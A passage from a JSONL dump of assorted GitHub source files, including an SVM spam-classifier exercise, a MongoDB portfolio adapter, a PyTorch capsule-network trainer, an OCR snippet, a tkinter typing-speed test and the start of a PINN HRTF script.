svm_predict(model, X)\n\n print('Training Accuracy: %.2f' % (np.mean(p == y) * 100))\n\n \"\"\"\n =================== Part 4: Test Spam Classification ================\n After training the classifier, we can evaluate it on a test set. We have\n included a test set in spamTest.mat\n \"\"\"\n\n # Load the test dataset\n # You will have Xtest, ytest in your environment\n spam_test_path = os.path.dirname(os.path.realpath(__file__)) + '/data/spamTest.mat'\n spam_test_path = spam_test_path.replace('\\\\', '/')\n data = loadmat(spam_test_path)\n Xtest, ytest = data['Xtest'].astype(float), data['ytest'][:, 0]\n\n print('Evaluating the trained Linear SVM on a test set ...')\n p = svm_predict(model, Xtest)\n\n print('Test Accuracy: %.2f' % (np.mean(p == ytest) * 100))\n\n input('\\nProgram paused. Press enter to continue.\\n')\n\n \"\"\"\n ================= Part 5: Top Predictors of Spam ====================\n Since the model we are training is a linear SVM, we can inspect the\n weights learned by the model to understand better how it is determining\n whether an email is spam or not. The following code finds the words with\n the highest weights in the classifier. Informally, the classifier\n 'thinks' that these words are the most likely indicators of spam.\n \"\"\"\n\n # Sort the weights and obtain the vocabulary list\n idx = np.argsort(model['w'])\n top_idx = idx[-15:][::-1]\n vocab_list = get_vocab_list()\n\n print('Top predictors of spam:')\n print('%-15s %-15s' % ('word', 'weight'))\n print('----' + ' ' * 12 + '------')\n for word, w in zip(np.array(vocab_list)[top_idx], model['w'][top_idx]):\n print('%-15s %0.2f' % (word, w))\n\n input('\\nProgram paused. Press enter to continue.\\n')\n\n \"\"\"\n =================== Part 6: Try Your Own Emails =====================\n Now that you've trained the spam classifier, you can use it on your own\n emails! In the starter code, we have included spamSample1.txt,\n spamSample2.txt, emailSample1.txt and emailSample2.txt as examples. \n The following code reads in one of these emails and then uses your \n learned SVM classifier to determine whether the email is Spam or \n Not Spam\n \"\"\"\n\n # Set the file to be read in (change this to spamSample2.txt,\n # emailSample1.txt or emailSample2.txt to see different predictions on\n # different emails types). Try your own emails as well!\n email_sample_path = os.path.dirname(os.path.realpath(__file__)) + '/data/emailSample1.txt'\n email_sample_path = email_sample_path.replace('\\\\', '/')\n\n with open(email_sample_path) as fid:\n file_contents = fid.read()\n\n word_indices = process_email(file_contents, verbose=False)\n x = email_features(word_indices)\n p = svm_predict(model, x)\n\n print('\\nProcessed %s\\nSpam Classification: %s' % (email_sample_path, 'spam' if p else 'not spam'))\n print('(1 indicates spam, 0 indicates not spam)\\n\\n')\n","repo_name":"Flibielt/mlbasics-ex6","sub_path":"ex6/src/ex6_spam.py","file_name":"ex6_spam.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7366553113","text":"#Código para ordenar os valores de uma lista sem usar o Sort\n\nnúmeros = []\n\nfor c in range(0,5):\n new = int(input('Digite um valor: '))\n if c == 0 or new > números[-1]:\n números.append((new))\n print(f'Adicionado ao final da lista! ')\n else:\n pos = 0\n while pos < len(números):\n if new <= números[pos]:\n números.insert(pos, new)\n print(f'Adicionado na posição {pos} da lista')\n break\n pos += 1\n\nprint(f'Valores adicionados: {números}')\n","repo_name":"mateuzh/Python","sub_path":"desafio080.py","file_name":"desafio080.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30575090280","text":"from Domain.OrderModels.OrderStatus import OrderStatus\nfrom Domain.OrderModels.Order import Order\nfrom Domain.BuildEnumMethods import BuildEnumMethods\nfrom PortfolioEngine.Adapters.BaseAdapter.BaseAdapter import BaseAdapter\nimport logging\nfrom PortfolioEngine.Components.Portfolio import Portfolio\nfrom mongoengine import connect as meConnect\nfrom Domain.PortfolioDocument import PortfolioDocument\n\n\nclass MongoConfig():\n DB_CONNECTION = \"test\"\n DB_CONNECTION_HOST = \"localhost\"\n DB_CONNECTION_PORT = 27017\n PROFILE = \"default\"\n\nclass MongoAdapter(BaseAdapter):\n config : MongoConfig = MongoConfig()\n currentPortfolio : Portfolio\n\n def __init__(self):\n self.initializeCurrentPortfolio()\n\n def initializeCurrentPortfolio(self):\n self.connect()\n try:\n portfolioDoc = PortfolioDocument.objects(name = self.config.PROFILE).first()\n self.currentPortfolio = Portfolio()\n self.currentPortfolio.deepCopy(portfolioDoc)\n logging.info(\"Initialized currentPortfolio via DB\")\n except:\n self.currentPortfolio = Portfolio()\n logging.info(\"Initialized currentPortfolio via manual building\")\n\n\n def savePortfolio(self):\n doc = PortfolioDocument.build(method=BuildEnumMethods.MANUAL, tickerDistr = self.currentPortfolio.tickerAmounts, name = self.config.PROFILE)\n potentialExisting = None\n try:\n potentialExisting : PortfolioDocument= PortfolioDocument.objects(name = self.config.PROFILE).first()\n except:\n logging.warn(\"No existing portfolio document found\")\n if(potentialExisting is not None):\n potentialExisting.delete()\n doc.save()\n\n\n def connect(self):\n meConnect(self.config.DB_CONNECTION, \n host=self.config.DB_CONNECTION_HOST, \n port=self.config.DB_CONNECTION_PORT)\n\n \n def getCurrentPortfolio(self) -> Portfolio:\n return self.currentPortfolio\n\n def executeTradeCallBack(self, oStatus : OrderStatus):\n c = oStatus.contract\n ticker = c.symbol\n amt = oStatus.order.total_quantity\n port = self.getCurrentPortfolio()\n port.tickerAmounts[ticker] = amt\n self.savePortfolio()","repo_name":"jminahan/backtest_framework","sub_path":"PortfolioEngine/Adapters/MongoAdapter/MongoAdapter.py","file_name":"MongoAdapter.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28073608213","text":"from slackclient import SlackClient\nimport urllib\nimport serial\nimport sys\nimport time\nimport re\nfrom collections import deque\nimport math\n\nCOM_BAUD = 9600\n\ndef main():\n\n comport = input(\"Enter COM port name: \")\n\n\n ser = serial.Serial(comport, COM_BAUD, timeout = 0, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, xonxoff=1)\n\n ser.write(bytearray(\"g 1900\\r\\n\", \"UTF8\"))\n\n curLine = \"\"\n\n gps_status = None\n\n last_rec_time = time.time() * 1000\n\n alerted = False\n landed_alerted = False\n launch_alerted = False\n\n gps_start = None\n\n last_message_check = time.time() * 1000\n MESSAGE_CHECK_ITER = 5000\n\n message = \"\"\n\n maximum_altitude = 0\n maximum_speed = 0\n\n guess = []\n\n # Loop here and read COM data\n while True:\n\n bs = ser.read().decode(\"ISO-8859-1\")\n out = str(bs)\n if not out == '':\n if out == '\\r':\n out = '\\n'\n\n curLine += out\n\n if out == '\\n':\n\n #We got a new line. Processing...\n if(curLine.lower().find(\"selected\") != -1):\n m = re.search('.?(\\d)',curLine)\n level = int(m.group(0))\n print(\"\\n\\nWe are on level {lvl}\".format(lvl=level))\n\n if(curLine.lower().find(\"Enter the Code:\") != -1):\n print(\"\\n\\nWe are entering a code now\")\n\n\n curLine = \"\"\n # ser.write();\n\n sys.stdout.write(out)\n sys.stdout.flush()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"oberhauserg/HCS12-Guess-The-Number","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86625807416","text":"#! /usr/bin/env python\n\nimport sys\nimport os\nimport json\n\nfrom multiprocess import Pool\n\nsys.path.append(os.environ['REPO_DIR'] + '/utilities')\nfrom utilities2015 import *\nfrom data_manager import *\nfrom metadata import *\nfrom distributed_utilities import *\n\nimport argparse\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='Compress image as JPEG. The output version is the input version with \"Jpeg\" appended.')\n\nparser.add_argument(\"input_spec\", type=str, help=\"Input specifier\")\nparser.add_argument(\"--depth\", type=int, help=\"Image depth\", default=8) # imagemagick cannot generate 16-bit JPEG (?)\nparser.add_argument(\"--quality\", type=int, help=\"JPEG quality\", default=80)\nargs = parser.parse_args()\n\n\ninput_spec = load_ini(args.input_spec)\nimage_name_list = input_spec['image_name_list']\nstack = input_spec['stack']\nprep_id = input_spec['prep_id']\nif prep_id == 'None':\n prep_id = None\nresol = input_spec['resol']\nversion = input_spec['version']\nif version == 'None':\n version = None\n\ndepth = args.depth\nquality = args.quality\n\nfor img_name in image_name_list:\n\n in_fp = DataManager.get_image_filepath_v2(stack=stack, prep_id=prep_id, resol=resol, version=version, fn=img_name)\n out_fp = DataManager.get_image_filepath_v2(stack=stack, prep_id=prep_id, resol=resol, version=version+'Jpeg', fn=img_name)\n\n create_parent_dir_if_not_exists(out_fp)\n #download_from_s3(input_fp)\n execute_command(\"convert \\\"%(input_fp)s\\\" -depth %(depth)d -format jpg -quality %(quality)d \\\"%(output_fp)s\\\"\" % dict(input_fp=in_fp, output_fp=out_fp, depth=depth, quality=quality))\n #upload_to_s3(output_fp)\n\n","repo_name":"mistycheney/MouseBrainAtlas","sub_path":"preprocess/compress_jpeg.py","file_name":"compress_jpeg.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"21480426240","text":"import bpy\r\n\r\nmodule_names = [\r\n 'helpers',\r\n 'autoname_bone_chain',\r\n 'bone_lock',\r\n 'constraints_stretchto_reset',\r\n 'properties',\r\n 'retarget_armature',\r\n 'selection_sets',\r\n]\r\nfrom .. import import_or_reload_modules, register_submodules, unregister_submodules\r\nmodules = import_or_reload_modules(module_names, __name__)\r\n\r\nclass GRET_PT_rig(bpy.types.Panel):\r\n bl_space_type = 'VIEW_3D'\r\n bl_region_type = 'UI'\r\n bl_category = \"gret\"\r\n bl_label = \"Rig\"\r\n\r\n draw_funcs = []\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n return (context.active_object\r\n and context.active_object.type == 'ARMATURE'\r\n and context.mode in {'OBJECT', 'POSE', 'EDIT_ARMATURE'}\r\n and cls.draw_funcs)\r\n\r\n def draw(self, context):\r\n for draw_func in __class__.draw_funcs:\r\n draw_func(self, context)\r\n\r\ndef register(settings, prefs):\r\n global registered_modules\r\n registered_modules = register_submodules(modules, settings, GRET_PT_rig.draw_funcs)\r\n\r\n bpy.utils.register_class(GRET_PT_rig)\r\n\r\ndef unregister():\r\n bpy.utils.unregister_class(GRET_PT_rig)\r\n\r\n unregister_submodules(registered_modules, GRET_PT_rig.draw_funcs)\r\n","repo_name":"greisane/gret","sub_path":"rig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"6"} +{"seq_id":"70472752827","text":"from asyncio import sleep\nfrom click import Tuple\nimport torch\nimport numpy as np\nimport random\nimport cv2\nfrom tqdm import tqdm\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torchsummary\nfrom torch.optim import Adam\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nfrom sklearn import metrics\nfrom sklearn.metrics import recall_score, accuracy_score, precision_score, log_loss, classification_report, f1_score\nfrom metrics.metric import calculate_cls_metrics\n\nfrom utils.Log import Logger\nfrom utils.EarlyStopping import EarlyStopping\nfrom utils.ModelSaver import ModelSaver\n\nfrom dataloader.gen_dataloader import *\n\nimport sys, os\nimport os.path as osp\nsys.path.append(osp.dirname(__file__))\n\nfrom loss.focal_loss import FocalLoss as FL\nfrom loss.weightedBCE_loss import WeightedBinaryCrossEntropy as WBCE\n\nfrom typing import List, Tuple\nimport warnings\n# warnings.filterwarnings(\"default\")\nfrom sklearn.exceptions import UndefinedMetricWarning\n\nfrom model.cnn.capsule_net.model import VggExtractor, CapsuleNet\nfrom loss.capsule_loss import CapsuleLoss\nfrom module.train_torch import define_log_writer, define_device, calculate_metric, save_result, find_current_earlystopping_score\nfrom metrics.metric import calculate_cls_metrics\n\ndef eval_capsulenet(capnet, vgg_ext, dataloader, device, capsule_loss, adj_brightness=1.0, adj_contrast=1.0 ):\n capnet.eval()\n\n y_label = []\n y_pred = []\n y_pred_label = []\n loss = 0\n mac_accuracy = 0\n \n for inputs, labels in dataloader:\n labels[labels > 1] = 1\n img_label = labels.numpy().astype(np.float)\n inputs, labels = inputs.to(device), labels.to(device)\n\n input_v = Variable(inputs)\n x = vgg_ext(input_v)\n classes, class_ = capnet(x, random=False)\n\n loss_dis = capsule_loss(classes, Variable(labels, requires_grad=False))\n loss_dis_data = loss_dis.item()\n output_dis = class_.data.cpu().numpy()\n\n output_pred = np.zeros((output_dis.shape[0]), dtype=np.float)\n\n for i in range(output_dis.shape[0]):\n if output_dis[i,1] >= output_dis[i,0]:\n output_pred[i] = 1.0\n else:\n output_pred[i] = 0.0\n\n loss += loss_dis_data\n y_label.extend(img_label)\n y_pred.extend(output_dis)\n y_pred_label.extend(output_pred)\n mac_accuracy += metrics.accuracy_score(img_label, output_pred)\n \n mac_accuracy /= len(dataloader)\n loss /= len(dataloader)\n assert len(y_label) == len(y_pred_label), \"Bug\"\n ######## Calculate metrics:\n # built-in methods for calculating metrics\n mic_accuracy, reals, fakes, micros, macros = calculate_metric(y_label, y_pred_label)\n calculate_cls_metrics(y_label=np.array(y_label, dtype=np.float64), y_pred_label=np.array(y_pred_label, dtype=np.float64), save=True, print_metric=False)\n return loss, mac_accuracy, mic_accuracy, reals, fakes, micros, macros\n\ndef train_capsulenet(train_dir = '', val_dir ='', test_dir = '', gpu_id=0, beta1=0.9, dropout=0.05, image_size=128, lr=3e-4, \\\n batch_size=16, num_workers=4, checkpoint='', resume='', epochs=20, eval_per_iters=-1, seed=0, \\\n adj_brightness=1.0, adj_contrast=1.0, es_metric='val_loss', es_patience=5, model_name=\"capsule\", args_txt=\"\", dropout_in_mlp=True, augmentation=False):\n # Generate dataloader train and validation \n dataloader_train, dataloader_val, num_samples = generate_dataloader_single_cnn_stream(train_dir, val_dir, image_size, batch_size, num_workers, augmentation=augmentation)\n dataloader_test = generate_test_dataloader_single_cnn_stream(test_dir, image_size, batch_size, num_workers)\n \n # Define devices\n device = define_device(seed=seed, model_name=model_name)\n \n # Define and load model\n vgg_ext = VggExtractor().to(device)\n capnet = CapsuleNet(num_class=2, device=device).to(device)\n \n # Define optimizer (Adam) and learning rate decay\n init_lr = lr\n init_epoch = 0\n init_step = 0\n init_global_acc = 0\n init_global_loss = 0\n if resume != \"\":\n try:\n if 'epoch' in checkpoint:\n init_epoch = int(resume.split('_')[3])\n init_step = init_epoch * len(dataloader_train)\n init_lr = lr * (0.8 ** ((init_epoch - 1) // 2))\n print('Resume epoch: {} - with step: {} - lr: {}'.format(init_epoch, init_step, init_lr))\n if 'step' in checkpoint:\n init_step = int(resume.split('_')[3])\n init_epoch = int(init_step / len(dataloader_train))\n init_lr = lr * (0.8 ** (init_epoch // 2))\n with open(osp.join(checkpoint, 'global_acc_loss.txt'), 'r') as f:\n line = f.read().strip()\n init_global_acc = float(line.split(',')[0])\n init_global_loss = float(line.split(',')[1])\n print('Resume step: {} - in epoch: {} - lr: {} - global_acc: {} - global_loss: {}'.format(init_step, init_epoch, init_lr, init_global_acc, init_global_loss)) \n except:\n pass\n \n optimizer = optim.Adam(capnet.parameters(), lr=init_lr, betas=(beta1, 0.999))\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [2*i for i in range(1, epochs//2 + 1)], gamma = 0.8)\n\n # Define criterion\n capsule_loss = CapsuleLoss().to(device)\n \n # Define logging factor:\n ckc_pointdir, log, batch_writer, epoch_writer_tup, step_writer_tup = define_log_writer(checkpoint, resume, args_txt, (capnet, model_name, image_size))\n epoch_ckcpoint, epoch_val_writer, epoch_test_writer = epoch_writer_tup\n step_ckcpoint, step_val_writer, step_test_writer = step_writer_tup\n \n # Define Early stopping and Model saver\n early_stopping = EarlyStopping(patience=es_patience, verbose=True, tunning_metric=es_metric)\n epoch_model_saver = ModelSaver(save_metrics=[\"val_loss\", \"val_acc\", \"test_loss\", 'test_acc'])\n step_model_saver = ModelSaver(save_metrics=[\"val_loss\", \"val_acc\", \"test_loss\", 'test_acc'])\n \n if resume != \"\":\n capnet.load_state_dict(torch.load(osp.join(checkpoint, resume)))\n capnet.train(mode=True)\n \n if device != 'cpu':\n for state in optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n global_loss = init_global_loss\n global_acc = init_global_acc\n global_step = init_step\n\n capnet.train()\n\n for epoch in range(init_epoch, epochs):\n print(\"\\n=========================================\")\n print(\"Epoch: {}/{}\".format(epoch+1, epochs))\n print(\"Model: {} - {}\".format(model_name, args_txt))\n print(\"lr = \", optimizer.param_groups[0]['lr'])\n\n # Train\n capnet.train()\n running_loss = 0\n running_acc = 0\n y_label = np.array([], dtype=np.float)\n y_pred_label = np.array([], dtype=np.float)\n\n y_label_step = []\n y_pred_label_step = []\n \n print(\"Training...\")\n for inputs, labels in tqdm(dataloader_train):\n global_step += 1\n # Push to device\n labels[labels > 1] = 1\n img_label = labels.numpy().astype(np.float)\n inputs, labels = inputs.to(device), labels.to(device)\n # Clear gradient after a step\n optimizer.zero_grad()\n\n # Forward network\n input_v = Variable(inputs)\n x = vgg_ext(input_v)\n classes, class_ = capnet(x, random=True, dropout=dropout)\n\n # Find loss\n loss_dis = capsule_loss(classes, Variable(labels, requires_grad=False))\n loss_dis_data = loss_dis.item()\n \n # Backpropagation and update weights\n loss_dis.backward()\n optimizer.step()\n\n # update running (train) loss and accuracy\n output_dis = class_.data.cpu().numpy()\n output_pred = np.zeros((output_dis.shape[0]), dtype=np.float)\n\n for i in range(output_dis.shape[0]):\n if output_dis[i,1] >= output_dis[i,0]:\n output_pred[i] = 1.0\n else:\n output_pred[i] = 0.0\n \n y_label = np.concatenate((y_label, img_label))\n y_pred_label = np.concatenate((y_pred_label, output_pred))\n \n running_loss += loss_dis_data\n global_loss += loss_dis_data\n y_label_step.extend(img_label)\n y_pred_label_step.extend(output_pred)\n global_acc += metrics.accuracy_score(y_label_step, y_pred_label_step)\n\n # Save step's loss:\n # To tensorboard and to writer\n log.write_scalar(scalar_dict={\"Loss/Single step\": loss_dis_data}, global_step=global_step)\n batch_writer.write(\"{},{:.4f}\\n\".format(global_step, loss_dis_data))\n\n # Eval after iters:\n if eval_per_iters != -1:\n if global_step % eval_per_iters == 0:\n capnet.eval()\n # Eval validation set\n val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros = eval_capsulenet(capnet, vgg_ext, dataloader_val, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n save_result(step_val_writer, log, global_step, global_loss/global_step, global_acc/global_step, val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros, is_epoch=False, phase=\"val\")\n # Eval test set\n test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros = eval_capsulenet(capnet, vgg_ext, dataloader_test, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n save_result(step_test_writer, log, global_step, global_loss/global_step, global_acc/global_step, test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros, is_epoch=False, phase=\"test\")\n # Save model:\n step_model_saver(global_step, [val_loss, val_mic_acc, test_loss, test_mic_acc], step_ckcpoint, capnet)\n step_model_saver.save_last_model(step_ckcpoint, capnet, global_step)\n step_model_saver.save_model(step_ckcpoint, capnet, global_step, save_ckcpoint=False, global_acc=global_acc, global_loss=global_loss)\n\n es_cur_score = find_current_earlystopping_score(es_metric, val_loss, val_mic_acc, test_loss, test_mic_acc, test_reals[2], test_fakes[2], test_macros[2])\n early_stopping(es_cur_score)\n if early_stopping.early_stop:\n print('Early stopping. Best {}: {:.6f}'.format(es_metric, early_stopping.best_score))\n time.sleep(5)\n os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(step_model_saver.best_scores[0], step_model_saver.best_scores[1], step_model_saver.best_scores[2], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n return\n capnet.train()\n\n y_label_step = []\n y_pred_label_step = []\n \n running_acc = metrics.accuracy_score(y_label, y_pred_label) \n # Eval\n # print(\"Validating epoch...\")\n # capnet.eval()\n # val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros = eval_capsulenet(capnet, vgg_ext, dataloader_val, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n # save_result(epoch_val_writer, log, epoch+1, running_loss/len(dataloader_train), running_acc, val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros, is_epoch=True, phase=\"val\")\n # # Eval test set\n # test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros = eval_capsulenet(capnet, vgg_ext, dataloader_test, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n # save_result(epoch_test_writer, log, epoch+1, running_loss/len(dataloader_train), running_acc, test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros, is_epoch=True, phase=\"test\")\n # # Save model:\n # epoch_model_saver(epoch+1, [val_loss, val_mic_acc, test_loss, test_mic_acc, test_reals[2], test_fakes[2], test_macros[2]], epoch_ckcpoint, capnet)\n # epoch_model_saver.save_last_model(epoch_ckcpoint, capnet, epoch+1)\n \n # Reset to the next epoch\n running_loss = 0\n running_acc = 0\n scheduler.step()\n capnet.train()\n # Early stopping:\n #\n time.sleep(5)\n # Save epoch acc val, epoch acc test, step acc val, step acc test\n os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(step_model_saver.best_scores[0], step_model_saver.best_scores[1], step_model_saver.best_scores[2], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n # os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(epoch_model_saver.best_scores[1], epoch_model_saver.best_scores[3], step_model_saver.best_scores[1], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n return","repo_name":"phuc180155/GraduationThesis","sub_path":"my_thesis/forensics/dl_technique/module/train_two_outclass.py","file_name":"train_two_outclass.py","file_ext":"py","file_size_in_byte":13630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"28507943634","text":"#!C:\\Users\\op\\anaconda3\\python.exe\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\nform = cgi.FieldStorage()\ntitle = form['title'].value\ndescription = form['description'].value\n\nnew_file= open(\"content/{}.txt\".format(title), 'w', encoding='utf-8')\nnew_file.write(description)\n\nprint(\"Location: index.py?id={}\\n\".format(title))\n","repo_name":"Han-seokwon/WEB_programming","sub_path":"python_web/python_CGI/process_create.py","file_name":"process_create.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41347146904","text":"\n# import the necessary packages\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\nimport os\n\n#choose your Preprocessor Here\npreprocess=\"thresh\"\nfilename = \"Output/test.png\" #location of image\n\nif preprocess == \"thresh\":\n\tgray = cv2.threshold(gray, 0, 255,\n\t\tcv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n# make a check to see if median blurring should be done to remove\n# noise\nelif preprocess == \"blur\":\n\tgray = cv2.medianBlur(gray, 3)\n\n# write the grayscale image to disk as a temporary file so we can\n# apply OCR to it\ncv2.imwrite(filename, gray)\n\n# load the image as a PIL/Pillow image, apply OCR, and then delete\n# the temporary file\ntext = pytesseract.image_to_string(Image.open(filename))\nos.remove(filename)\nprint(text)\n\n# show the output images\n# cv2.imshow(\"Image\", image)\ncv2.imshow(\"Output\", gray)\ncv2.waitKey(0)\n","repo_name":"SRM-Hackathon/Dragon-Booster","sub_path":"Character_Recognization_Code/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43927741864","text":"import tkinter as tk\nimport csv\nimport random\nimport time\nfrom PIL import Image, ImageTk\n\n############ SENTENCE GETTER ############\ndef sentencer():\n with open(\"sentences.csv\", \"r\") as sentence_csv_file:\n csv_reader = csv.reader(sentence_csv_file)\n next(csv_reader)\n return random.choice([line[0] for line in csv_reader])\n\n############ REGISTER PRESS ############\nactive = True\ndef onKeyPress(event):\n if (event.char.isalnum() or event.char.isspace() or event.char =='-' or event.char ==','or event.char ==\"'\") and active==True:\n key_checker(event.char,sent)\n\n\n############ RESET ############\ndef reset():\n global cnt, active, start, end, charpersec, wordpermin, incorrect, sent\n sent = sentencer().lower()\n\n label1.config(text=('TYPE SENTENCE BELOW:\\n\\n' + ''))\n text.configure(state='normal')\n text.delete(\"1.0\", \"end\")\n text.insert(tk.END,chars= sent)\n text.configure(state='disabled')\n label2.config(text=('Char/Sec: \\nWord/Min: \\n% Correct: '), justify='left')\n\n cnt,charpersec,wordpermin,incorrect=0,0,0,0\n active=True\n\n\n############ CHECK PRESS ############\ncnt = 0\nincorrect = 0\ndef key_checker(char,sentence):\n global cnt, active, start, end, charpersec, wordpermin, incorrect\n if cnt == (len(sentence)-2):\n if char == sentence[cnt]:\n text.configure(state='normal')\n text.tag_remove('cur', f\"1.{cnt}\")\n text.tag_add(\"o\", f\"1.{cnt}\", )\n text.tag_configure(\"o\", foreground='green')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n else:\n text.configure(state='normal')\n text.tag_remove('cur', f\"1.{cnt}\")\n text.tag_add(\"x\", f\"1.{cnt}\")\n text.tag_configure(\"x\", foreground='red')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n active=False\n end = time.time()\n timed = end - start\n print(timed)\n charpersec = round((len(sent) / timed),2)\n wordpermin = round((charpersec*12),2)\n percor = round(((len(sent)-incorrect)/len(sent))*100,2)\n print(f'Characters Per Second: {charpersec}\\nWords Per Minute (average): {wordpermin}\\n% Correct: {percor}%')\n label2.config(text=(f'Char/Sec: {charpersec}\\nWord/Min: {wordpermin}\\n% Correct: {percor}%'))\n elif char == sentence[cnt]:\n if cnt==0:\n start = time.time()\n print(\"hello\")\n text.configure(state='normal')\n text.tag_remove('cur',f\"1.{cnt}\")\n text.tag_add(\"o\",f\"1.{cnt}\",)\n text.tag_configure(\"o\",foreground='green')\n text.tag_add(\"cur\",f\"1.{cnt+1}\",)\n text.tag_configure(\"cur\",background='orange')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n else:\n text.configure(state='normal')\n text.tag_remove('cur',f\"1.{cnt}\")\n text.tag_add(\"x\",f\"1.{cnt}\")\n text.tag_configure(\"x\",foreground='red')\n text.tag_add(\"cur\",f\"1.{cnt+1}\",)\n text.tag_configure(\"cur\",background='orange')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n incorrect+=1\n\n cnt+=1\n\n\n\n\n############ WINDOW ############\n\nsent = sentencer().lower()\nwindow = tk.Tk()\nwindow.iconbitmap('favicon.ico')\nwindow.title(' Typing Speed Test')\nsw = round(window.winfo_screenwidth() / 2)\nsh = round(window.winfo_screenheight() / 3)\nwindow.geometry(f'{sw}x{sh}')\nwindow.configure(bg='#FFFFFF')\nmy_font1=('times', 30, 'bold')\n\nlabel1 = tk.Label(window,text=('TYPE SENTENCE BELOW:\\n\\n' + ''),width=30,font=my_font1,bg='#FFFFFF')\nlabel1.configure(bg='#FFFFFF', wraplength=600)\nlabel1.grid(row=0,column=0,columnspan=1)\n\n\ntext = tk.Text(window, font=('Sans Serif', 24), height=4, width=round(sw/40),wrap='word')\ntext.insert(tk.END,chars= sent)\ntext.configure(state='disabled')\ntext.grid(row=1,column=0,columnspan=1)\n\n\nlabel2 = tk.Label(window,text=('Char/Sec: \\nWord/Min: \\n% Correct: '),width=30,font=my_font1,bg='#FFFFFF', justify='left')\nlabel2.configure(bg='#FFFFFF', wraplength=400)\nlabel2.grid(row=1,column=1,columnspan=1)\n\nbutton1 = tk.Button(window, text='Browse Files',width=20,command = lambda:reset())\nbtn_img = Image.open('button_reset.png')\nimz = ImageTk.PhotoImage(btn_img)\nbutton1.configure(image=imz, width=imz.width(), bg='#FFFFFF',borderwidth=0)\nbutton1.grid(row=2,column=0,columnspan=1, padx=10, pady=10)\n\n############ TIMER ############\nstart = time.time()\nprint(\"hello\")\nend = time.time()\ncharpersec = 0\nwordpermin = 0\n\n\n\n\n\n############ ############ ############\nwindow.bind('', onKeyPress)\nwindow.mainloop()","repo_name":"GithubMastor/typing-speed-tester","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10220581199","text":"########################################################################################################################\n# PINN method for HRTF interpolation \n# \n# Given HRTF from limited number of directions (330 hrtf), \n# we wish to interpolate the HRTF over a large direction (930 hrtf)\n# \n# Fei Ma, \n# feima1024@gmail.com\n# 4th, Oct, 2023 \n########################################################################################################################\n## if you find the code useful, \n## please consider denoting to the Free Sofware Fundation or the Wikimedia Foundation\n## https://my.fsf.org/\n## https://wikimediafoundation.org/\n########################################################################################################################\n# the code runs on my macpro with python 3.9, 3.10, tensorflow 2.12 and 2.13\n# the numpy version and scipy version should not be a problem if they are compitable with python and tensorflow\n# With just 3 hidden layers and <16 nodes in each hidden layer, the Network is small, and can be trained faster on \n# powerful CPU rather than GPU. \n########################################################################################################################\n# import the python packages, \nimport tensorflow as tf\nfrom tensorflow.keras import activations\nfrom keras import backend as 